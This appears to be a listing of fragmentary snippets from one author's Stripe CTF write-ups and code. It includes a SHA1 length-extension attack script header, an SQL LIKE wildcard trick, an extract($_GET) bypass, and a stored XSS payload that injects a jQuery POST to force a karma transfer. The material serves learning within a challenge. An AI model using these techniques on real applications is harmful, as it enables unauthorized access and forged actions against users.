bubba-h57

<?php
/*
 * A simple method for communicating key->data sets accross
 * requests/machines along with some meta-data regarding
 * lifetime of the data as well as owner.
 * 
 * For example, assume a token is emailed to individuals that 
 * allow them to access some particular data/functionality
 * for a specific period of time. By providing a URL for them
 * to click that has the token embedded, you can verify the data

bubba-h57

$encryptedString = '7DjnpOXG+FrUaOuc8x6vyrkk3atSiAf425ly5KpG7lOYgwouw2UATw==';
$iv = '12345678';
$passphrase = '8chrsLng';

$string = &decryptPhpEncrypted $encryptedString, $passphrase, $iv;
# Expect: Some Secret thing I want to encrypt

sub decryptPhpEncrypted() {
  my ($encryptedString, $passphrase, $iv) = @_;
  my $keysize = length($passphrase);

bubba-h57

#!/usr/bin/env python
#
# sha1 padding/length extension attack
# by rd@vnsecurity.net
# modified by ... rob@hines57.com
#

import sys
import hashlib
import sha

bubba-h57

<html>
<head>
<title>Bubba Hacks Level 2 Server</title>
</head>
<body>

<?php
$myPubKey = 'STICK YER OWN PUB KEY INFO HERE';
print "Finding Real Path ...<br/>";

bubba-h57

We can see that it's querying the SQL database with our user-supplied input. We also know that it is an sqlite3 database. When looking at the SQL statement, we can see that it's using the LIKE operator, which happens to have a wildcard character (%). When we supply the wildcard character, it will respond with all the secrets in the database.

bubba-h57

So let's step through the code and see what's happening:

creates $filename storing 'secret-combination.txt'
extract $_GET (all GET parameters supplied by the user)
if $attempt is set:
declare $combination with the trim()'d contents of $filename
if $attempt and $combination are equal
print contents of 'level02-password.txt'
else
print incorrect

bubba-h57

<html>
<head>
<title>Bubba Hacks Level 2 Server</title>
</head>
<body>
<h1>Your Level 3 Password</h1>
<?php echo file_get_contents('../password.txt'); ?>
</body>
</html>

bubba-h57

Ok, so let’s look at some important parts. We know it's sqlite3 again and how it is setup:



# CREATE TABLE users (
#   id VARCHAR(255) PRIMARY KEY AUTOINCREMENT,
#   username VARCHAR(255),
#   password_hash VARCHAR(255),
#   salt VARCHAR(255)
# );

bubba-h57

This is a nice little XSS/XSRF challenge. The goal here is to get that karma_fountain to send you some karma, which in turn will let you view their password.

 When registering a new account, you can insert malicious code into the password field, which will then be displayed once you send someone karma because the application is designed to show users your password once they receive karma.

In this situation they're including JQuery, so it makes our lives even easier when trying to make requests. The idea is to inject some malicious code into the karma_fountains page that will automatically make them transfer you some karma.

I went and created a new user named 'bubba' with the password:

'<script>$.post("transfer", { to: "bubba", amount: "2" } );</script>'

bubba-h57

So, this problem is just... insecure communication in general. There are a couple of issues here.


This  code block checks to see if it was a POST but doesn't check if parameters supplied were on the GET or POST lines:



    post '/*' do
      pingback = params[:pingback]
      username = params[:username]